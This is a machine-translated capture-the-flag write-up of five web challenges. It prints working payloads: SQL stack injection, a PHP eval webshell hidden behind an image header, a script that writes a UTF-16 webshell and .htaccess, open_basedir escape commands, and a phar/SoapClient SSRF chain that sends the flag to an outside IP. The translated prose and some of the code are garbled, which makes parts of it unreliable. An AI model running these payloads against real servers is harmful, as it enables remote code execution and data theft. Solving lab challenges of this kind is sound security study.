0x01 EasySQL
This is a subject of investigation stack injection, but this question is not entirely because of the filter so unexpected Solutions
Unexpected Solution
Direct structure *,1
constructed such that the final stitching of the query becomes select *,1||flag from Flag
, can directly get all the contents of the current table, it is possible to directly obtain flag
Normal problem-solving
Stack injection, configured to 1;show tables;#
get information on the current table
And according to echo, we can roughly determine the query is: ... POST['query']||flag ...
Direct construction 1;select * from Flag;#
appears Nonono
to be aware of the existence filtration, filtration of the flag
At this time, by stacking the injection, setting sql_mode
the value of PIPES_AS_CONCAT
, as a string so that the connection || operator or operators not, the payload is so constructed:1;set sql_mode=PIPES_AS_CONCAT;select 1
Get flag
0x02 CheckIn
When uploading files found Upload extension file named aaa, echo <? in contents!
, indicating that the contents of the file can not contain <?, you can know when to upload a blacklist filter, directly to the end of the file suffix changed to jpg, echoexif_imagetype:not image!
I guess the backend should call the php exif_imagetype()
function to bypass this well, add a picture header on it, I add here is that GIF89a, after a successful upload a file, in the echo found in the upload directory exists index.php
file
Here you can know need to use .user.ini
files, to upload a .user.ini
file, upload content
GIF89a
auto_prepend_file="test.png"
By auto_prepend_file
the specified file needs to contain, and here I include atest.png
Then upload need to include into the test.png
file, the file contents:
GIF89a
<script language="php">eval($_POST['five'])</script>
At this time, in fact, put a word document which contains test.png upload files into a directory in the index.php file, you can perform a word directly in index.php, the sword even the ants can be found flag in the file reads like
Posted an excellent article
0x03 Pythonginx
After entering the page to the source code:
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.the Join (newhost) \ # remove url spaces
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->
This question is the topic and ideas from this year's BlackHat a topic related PPT as follows:
Python on the content of which is as follows:
Gangster write a script to find the available characters:
\# coding:utf-8
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
if("-") in res:
continue
print("U:{} A:{} ascii:{} ".format(tmp, res, i))
except:
pass
Here it is to find a way to use, according to the title of tips:
url part of the front should be suctf.cc
Also he referred to Nginx, Nginx configuration file directory:/usr/local/nginx/conf/nginx.conf
When running the above script, which has an available characters:
It can be thought configured: file://suctf.c℆sr/local/nginx/conf/nginx.conf
(Another way is to use bypass ℂ instead be bypassed and c), which can read the flag position:
Last construct payload:file://suctf.c℆sr/fffffflag
0x04 EasyWeb
Title page to the source code
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
if(!file_exists($userdir)){
mkdir($userdir);
}
if(!empty($_FILES["file"])){
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1);
if(preg_match("/ph/i",$extension)) die("^_^");
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
if(!exif_imagetype($tmp_name)) die("^_^");
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}
$hhh = @$_GET['_'];
if (!$hhh){
highlight_file(__FILE__);
}
if(strlen($hhh)>18){
die('One inch long, one inch strong!');
}
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
die('Try something else!');
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
eval($hhh);
?>
Code is divided into two parts, the top is a get_the_flag()
function, the function should be a file upload verification function, by the following _
parameter passing into, through a series of tests if may be performed eval () function. If this problem is to consider the RCE, then, why give the uploaded file on behalf of, look at those filters, it was hard to get around, so consider calling get_the_flag()
function to look through the file upload function Can
So the next step is to construct payload bypass the detection and regular calls get_the_flag()
, filter here is very strict, almost all filtration visible characters, you can look at this article https://www.leavesongs.com/penetration/webshell-without-alphanum. html
You can know how to get around, and here you can take advantage of exclusive or non-visible to construct characters, the script follows
<?php
$payload = '';
for($i=0;$i<strlen($argv[1]);$i++)
{
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255);
if($k == $argv[1][$i])
$payload .= '%'.dechex($j);
}
}
echo $payload;
You can get
So try to construct payload:
$ {% I% i% i% i ^% A0% b8% what% ab} {%} i (); i = &% phpinfo
Construction successful, so constructed payload:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag
The next step is to upload by getshell, here it is indeed a need to upload .htaccess files, bypassing can refer to this article:
https://www.cnblogs.com/wfzWebSecuity/p/11207145.html
exif_imagetype()
The way to bypass the same as above
Php noted here that it is version 7.2, which can not <script>
bypass the labels <?
of the filter may be bypassed by encoding, such as the original use utf8 encoding, if the shell can be encoded with utf16 Bypass
Directly generate script files:
SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n" def generate_php_file(filename, script): phpfile = open(filename, 'wb') phpfile.write(script.encode('utf-16be')) phpfile.write(SIZE_HEADER) phpfile.close() def generate_htacess(): htaccess = open('.htaccess', 'wb') htaccess.write(SIZE_HEADER) htaccess.write(b'AddType application/x-httpd-php .lethe\n') htaccess.write(b'php_value zend.multibyte 1\n') htaccess.write(b'php_value zend.detect_unicode 1\n') htaccess.write(b'php_value display_errors 1\n') htaccess.close() generate_htacess() generate_php_file("shell.lethe", "<?php eval($_GET['cmd']); die(); ?>")
Then use Postman were constructed to upload .htaccess
and shell.lethe
:
Get the file path upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.lethe
Use shell.lethe execute the command, but still need to bypass open_basedir
.
Reference: See PHP open_basedir bypass from the bottom
So configured payload follows:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(glob('*'));
After obtaining flag position, you can finally read flag, payload:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(file_get_contents(THis_Is_tHe_F14g));
0x05 Upload Lab 2
Subject to the source, so that the code audit
Ad {class ...... function __destruct () { getflag ($ this-> ip, $ this-> Port); // use your own server listens on a port to ensure that messages can be received to obtain Flag } } IF ($ _ SERVER [ 'REMOTE_ADDR'] == '127.0.0.1') { IF (isset ($ _ the POST [ 'ADMIN'])) { $ IP = $ _POST [ 'IP']; // flag used to get you server IP $ port = $ _POST [ 'port']; // you acquired flag for the server port $ clazz = $ _POST [ 'clazz']; $ func1 = $ _POST [ 'func1']; $ $ = func2 _POST [ 'func2']; $ func3 = $ _POST [ 'func3']; $ arg1 = $ _POST [ 'arg1']; $ arg2 = $ _POST [ 'arg2']; $ arg2 = $ _POST [ 'arg3'] ; $ ADMIN the Ad new new = ($ IP, Port $, $ clazz,$func1, $func2, $func3, $arg1, $arg2, $arg3); $ admin-> the Check (); } } ......
That SSRF need to deserialize trigger getFlag function, so continue to look at the code
#class.php ...... function getMIME(){ $finfo = finfo_open(FILEINFO_MIME_TYPE); $this->type = finfo_file($finfo, $this->file_name); finfo_close($finfo); } ......
Reference zsx article: https://blog.zsxsoft.com/post/38 , view the underlying code finfo_file
Wide to find finfo_file also called, so finfo_file also can trigger phar deserialize, then you can use the POST method to SoapClient access to the file admin.php by SSRF. But it also has limited func.php
<?php include 'class.php'; if (isset($_POST["submit"]) && isset($_POST["url"])) { if(preg_match('/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i',$_POST['url'])){ die("Go away!"); }else{ $file_path = $_POST['url']; $file = new File($file_path); $file->getMIME(); echo "<p>Your file type is '$file' </p>"; } }
phar agreement can not appear at the beginning or zxs that article written
That is configured to bypass the width phar click to call protocol, where at blowing Altman ( https://altman.vip/ ), Fuzz method can be utilized tophp://filter/resource=phar://
So the next step is to generate a phar script, like after uploading triggered by func
<?php class File{ public $file_name; public $type; public $func = "SoapClient"; function __construct(){ $this->file_name = array(null, array('location' => "http://127.0.0.1/admin.php", 'uri' => "c", 'user_agent' => "catcat\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\n\r\nip=72.19.12.57&port=1234&admin=1&clazz=ArrayIterator&func1=append&func2=append&func3=append&arg1=1&arg2=1&arg3=1\r\n\r\n\r\n")); } } $o = new File(); $phar=new Phar('poc.phar'); $phar->startBuffering(); $phar->setStub("GIF89a< ?php __HALT_COMPILER(); ?>"); $phar->setMetadata($o); $phar->addFromString("foo.txt","bar"); $ Phar-> stopBuffering ();
When I run the script, there has been error
Phar.readonly need to be set to Off
Then change the suffix to upload, I've changed jpg,
Vps listening on what port, triggering it to func.php
The question is ~~~, I can not listen, I do not know what the problem is, the feeling may be foreign IP, you can not be accessed? ? ?
Confused, there is time to look at it, Gugu Gu ~ ~ ~
Did not understand, only the online Gangster wp moved here~~~
Plus point links to other chiefs